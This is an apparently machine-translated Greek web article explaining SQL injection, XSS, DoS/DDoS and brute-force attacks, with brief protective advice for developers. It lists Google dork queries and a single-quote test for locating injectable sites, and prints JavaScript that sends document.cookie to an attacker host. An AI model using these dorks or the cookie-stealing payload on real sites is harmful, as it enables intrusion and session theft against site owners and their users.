• inurl:declaration_more.php?decl_id=
• inurl:pageid=
• inurl:games.php?id=
• inurl:page.php?file=
• inurl:newsDetail.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=

Πώς να τα χρησιμοποιήσετε; Απλώς εισάγετέ τα σε μια μηχανή αναζήτησης Google ή Yandex. Η μηχανή αναζήτησης θα σας δώσει όχι μόνο έναν ευάλωτο ιστότοπο, αλλά και μια σελίδα σχετικά με αυτήν την ευπάθεια. Αλλά δεν θα σταματήσουμε εκεί και θα βεβαιωθούμε ότι η σελίδα είναι πραγματικά ευάλωτη. Για να γίνει αυτό, αρκεί να βάλετε ένα μόνο εισαγωγικό «‘ μετά την τιμή «id=1». Κάτι σαν αυτό:

• inurl:games.php?id=1'

Και ο ιστότοπος θα μας δώσει ένα σφάλμα σχετικά με το ερώτημα SQL. Τι χρειάζεται στη συνέχεια ο χάκερ μας;

Και μετά χρειάζεται αυτόν ακριβώς τον σύνδεσμο προς τη σελίδα σφάλματος. Στη συνέχεια, η εργασία για την ευπάθεια στις περισσότερες περιπτώσεις γίνεται στη διανομή "Kali linux" με τα βοηθητικά προγράμματα για αυτό το τμήμα: εισαγωγή κωδικού έγχυσης και εκτέλεση των απαραίτητων λειτουργιών. Πώς θα συμβεί αυτό, δεν μπορώ να σας πω. Αλλά μπορείτε να βρείτε πληροφορίες σχετικά με αυτό στο Διαδίκτυο.

Αυτός ο τύπος επίθεσης πραγματοποιείται σε αρχεία Cookies. Οι χρήστες, με τη σειρά τους, λατρεύουν να τα αποθηκεύουν. Γιατί όχι? Πώς θα ήταν χωρίς αυτούς; Εξάλλου, χάρη στα Cookies, δεν χρειάζεται να εισάγουμε τον κωδικό πρόσβασης για το Vk.com ή το Mail.ru εκατό φορές. Και λίγοι είναι αυτοί που τα αρνούνται. Αλλά στο Διαδίκτυο, εμφανίζεται συχνά ένας κανόνας για τους χάκερ: ο συντελεστής ευκολίας είναι ευθέως ανάλογος με τον συντελεστή ανασφάλειας.

Για να υλοποιήσει μια επίθεση XSS, ο χάκερ μας χρειάζεται γνώση JavaScript. Με την πρώτη ματιά, η γλώσσα είναι πολύ απλή και ακίνδυνη, επειδή δεν έχει πρόσβαση σε πόρους υπολογιστή. Ένας χάκερ μπορεί να λειτουργήσει μόνο με JavaScript σε πρόγραμμα περιήγησης, αλλά αυτό είναι αρκετό. Μετά από όλα, το κύριο πράγμα είναι να εισαγάγετε τον κωδικό στην ιστοσελίδα.

Δεν θα μιλήσω αναλυτικά για τη διαδικασία της επίθεσης. Θα σας πω μόνο τα βασικά και το νόημα του πώς συμβαίνει αυτό.

Ένας χάκερ μπορεί να προσθέσει κώδικα JS σε κάποιο φόρουμ ή βιβλίο επισκεπτών:

document.location.href =”http://192.168.1.7/sniff.php?test”

Τα σενάρια θα μας ανακατευθύνουν στη μολυσμένη σελίδα, όπου θα εκτελεστεί ο κώδικας: είτε πρόκειται για sniffer, κάποιο είδος αποθήκευσης ή εκμετάλλευση, που με κάποιο τρόπο θα κλέψει τα Cookies μας από την κρυφή μνήμη.

Γιατί JavaScript; Επειδή η JavaScript είναι εξαιρετική στο χειρισμό αιτημάτων ιστού και έχει πρόσβαση σε Cookies. Αλλά αν το σενάριό μας μας μεταφέρει σε κάποια τοποθεσία, ο χρήστης θα το παρατηρήσει εύκολα. Εδώ ο χάκερ χρησιμοποιεί μια πιο πονηρή επιλογή - απλώς εισάγει τον κωδικό στην εικόνα.

Img=new Image();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

Απλώς δημιουργούμε μια εικόνα και της αναθέτουμε το σενάριό μας ως διεύθυνση.

Πώς να προστατευτείτε από όλα αυτά; Είναι πολύ απλό - μην κάνετε κλικ σε ύποπτους συνδέσμους.

DoS (από το αγγλικό Denial of Service - άρνηση υπηρεσίας) είναι μια επίθεση χάκερ σε ένα σύστημα υπολογιστή με στόχο να προκαλέσει την αποτυχία του. Πρόκειται για τη δημιουργία συνθηκών υπό τις οποίες οι καλόπιστοι χρήστες του συστήματος δεν μπορούν να έχουν πρόσβαση στους παρεχόμενους πόρους του συστήματος (διακομιστές), ή αυτή η πρόσβαση είναι δύσκολη. Μια αποτυχία συστήματος μπορεί επίσης να είναι ένα βήμα προς την εξαγορά του, εάν, σε κατάσταση έκτακτης ανάγκης, το λογισμικό παράγει οποιαδήποτε κρίσιμη πληροφορία: για παράδειγμα, μια έκδοση, μέρος ενός κώδικα προγράμματος κ.λπ. Αλλά πιο συχνά αυτό είναι ένα μέτρο οικονομικής πίεσης: η απώλεια μιας απλής υπηρεσίας που παράγει εισόδημα. Οι λογαριασμοί από τον πάροχο ή τα μέτρα για την αποφυγή μιας επίθεσης χτυπούν σημαντικά τον «στόχο» στην τσέπη Επί του παρόντος, οι επιθέσεις DoS και DDoS είναι οι πιο δημοφιλείς, καθώς επιτρέπουν σχεδόν σε οποιοδήποτε σύστημα να αποτύχει χωρίς να αφήνουν νομικά σημαντικά στοιχεία.

Ποια είναι η διαφορά μεταξύ της επίθεσης DoS και DDos;

Το DoS είναι μια επίθεση σχεδιασμένη με έξυπνο τρόπο. Για παράδειγμα, εάν ο διακομιστής δεν ελέγξει την ορθότητα των εισερχόμενων πακέτων, τότε ένας χάκερ μπορεί να υποβάλει ένα αίτημα που θα χρειαστεί για πάντα για να επεξεργαστεί και δεν θα υπάρχει αρκετός χρόνος επεξεργαστή για να εργαστεί με άλλες συνδέσεις. Κατά συνέπεια, οι πελάτες θα στερηθούν την εξυπηρέτηση. Αλλά δεν θα είναι δυνατή η υπερφόρτωση ή η απενεργοποίηση μεγάλων γνωστών τοποθεσιών με αυτόν τον τρόπο. Είναι οπλισμένοι με αρκετά μεγάλα κανάλια και εξαιρετικά ισχυρούς διακομιστές που μπορούν να αντιμετωπίσουν τέτοια υπερφόρτωση χωρίς προβλήματα.

Το DDoS είναι στην πραγματικότητα η ίδια επίθεση με το DoS. Αλλά αν στο DoS υπάρχει ένα πακέτο αιτήματος, τότε στο DDoS μπορεί να υπάρχουν εκατοντάδες ή περισσότερα από αυτά. Ακόμη και οι υπερ-ισχυροί διακομιστές μπορεί να μην είναι σε θέση να αντιμετωπίσουν μια τέτοια υπερφόρτωση. Επιτρέψτε μου να σας δώσω ένα παράδειγμα.

Μια επίθεση DoS είναι όταν συνομιλείτε με κάποιον, αλλά μετά έρχεται κάποιος κακότροπος και αρχίζει να φωνάζει δυνατά. Είναι είτε αδύνατο είτε πολύ δύσκολο να μιλήσεις. Λύση: καλέστε την ασφάλεια, η οποία θα ηρεμήσει και θα απομακρύνει το άτομο από το χώρο. Οι επιθέσεις DDoS είναι όταν ένα πλήθος από χιλιάδες τέτοιους κακομαθείς ανθρώπους ορμάει μέσα. Σε αυτή την περίπτωση, η ασφάλεια δεν θα μπορέσει να τους δέσει και να τους απομακρύνει.

Τα DoS και DDoS πραγματοποιούνται από υπολογιστές, τα λεγόμενα ζόμπι. Πρόκειται για υπολογιστές χρηστών που έχουν παραβιαστεί από χάκερ και δεν υποψιάζονται καν ότι το μηχάνημά τους συμμετέχει σε επίθεση σε οποιονδήποτε διακομιστή.

Πώς να προστατευτείτε από αυτό; Γενικά, σε καμία περίπτωση. Αλλά μπορείτε να κάνετε τα πράγματα πιο δύσκολα για έναν χάκερ. Για να το κάνετε αυτό, πρέπει να επιλέξετε μια καλή φιλοξενία με ισχυρούς διακομιστές.

Ένας προγραμματιστής μπορεί να βρει πολλά συστήματα προστασίας από επιθέσεις, να ελέγξει πλήρως τα σενάρια που έχουμε γράψει, να ελέγξει τον ιστότοπο για τρωτά σημεία κ.λπ. Αλλά όταν φτάσει στο τελευταίο βήμα της διάταξης του ιστότοπου, δηλαδή όταν ορίζει απλώς έναν κωδικό πρόσβασης για τον πίνακα διαχείρισης, μπορεί να ξεχάσει ένα πράγμα. Κωδικός πρόσβασης!

Δεν συνιστάται αυστηρά να ορίσετε έναν απλό κωδικό πρόσβασης. Αυτό θα μπορούσε να είναι 12345, 1114457, vasya111, κ.λπ. Δεν συνιστάται ο ορισμός κωδικών πρόσβασης με μήκος μικρότερο από 10-11 χαρακτήρες. Διαφορετικά, μπορεί να υποβληθείτε στην πιο συνηθισμένη και απλή επίθεση - την ωμή βία.

Η ωμή δύναμη είναι μια επίθεση αναζήτησης κωδικού πρόσβασης στο λεξικό που χρησιμοποιεί ειδικά προγράμματα. Τα λεξικά μπορεί να είναι διαφορετικά: Λατινικά, απαρίθμηση με αριθμούς, ας πούμε, μέχρι ένα συγκεκριμένο εύρος, μικτά (Λατινικά + αριθμοί), και υπάρχουν ακόμη και λεξικά με μοναδικούς χαρακτήρες @#4$%&*~~`”\ ? και τα λοιπά.

Φυσικά, αυτός ο τύπος επίθεσης είναι εύκολο να αποφευχθεί. Απλά βρείτε έναν πολύπλοκο κωδικό πρόσβασης. Ακόμη και ένα captcha μπορεί να σας σώσει. Επίσης, αν ο ιστότοπός σας είναι κατασκευασμένος σε CMS, τότε πολλοί από αυτούς εντοπίζουν αυτόν τον τύπο επίθεσης και αποκλείουν την IP. Πρέπει πάντα να θυμάστε ότι όσο περισσότεροι διαφορετικοί χαρακτήρες σε έναν κωδικό πρόσβασης, τόσο πιο δύσκολο είναι να μαντέψετε.

Πώς λειτουργούν οι χάκερ; Στις περισσότερες περιπτώσεις, είτε υποπτεύονται είτε γνωρίζουν μέρος του κωδικού πρόσβασης εκ των προτέρων. Είναι πολύ λογικό να υποθέσουμε ότι ο κωδικός πρόσβασης του χρήστη σίγουρα δεν θα αποτελείται από 3 ή 5 χαρακτήρες. Τέτοιοι κωδικοί πρόσβασης οδηγούν σε συχνό hacking. Βασικά, οι χάκερ παίρνουν μια σειρά από 5 έως 10 χαρακτήρες και προσθέτουν αρκετούς χαρακτήρες που μπορεί να γνωρίζουν εκ των προτέρων. Στη συνέχεια, δημιουργούνται κωδικοί πρόσβασης με τα απαιτούμενα εύρη. Η διανομή Kali Linux έχει ακόμη και προγράμματα για τέτοιες περιπτώσεις. Και voila, η επίθεση δεν θα διαρκέσει πλέον πολύ, αφού ο όγκος του λεξικού δεν είναι πλέον τόσο μεγάλος. Επιπλέον, ένας χάκερ μπορεί να χρησιμοποιήσει την ισχύ της κάρτας βίντεο. Ορισμένα από αυτά υποστηρίζουν το σύστημα CUDA και η ταχύτητα αναζήτησης αυξάνεται έως και 10 φορές. Και τώρα βλέπουμε ότι μια επίθεση με τόσο απλό τρόπο είναι αρκετά πραγματική. Αλλά δεν είναι μόνο οι ιστότοποι που υπόκεινται σε ωμή βία.

Αγαπητοί προγραμματιστές, μην ξεχνάτε ποτέ το σύστημα ασφάλειας πληροφοριών, γιατί σήμερα πολλοί άνθρωποι, συμπεριλαμβανομένων των κρατών, υποφέρουν από τέτοιου είδους επιθέσεις. Άλλωστε, η μεγαλύτερη ευπάθεια είναι ένα άτομο που μπορεί πάντα να αποσπάται κάπου ή κάτι να χάνει. Είμαστε προγραμματιστές, αλλά όχι προγραμματισμένες μηχανές. Να είστε πάντα σε επιφυλακή, γιατί η απώλεια πληροφοριών μπορεί να έχει σοβαρές συνέπειες!

Ίσως είναι χρήσιμο να διαβάσετε: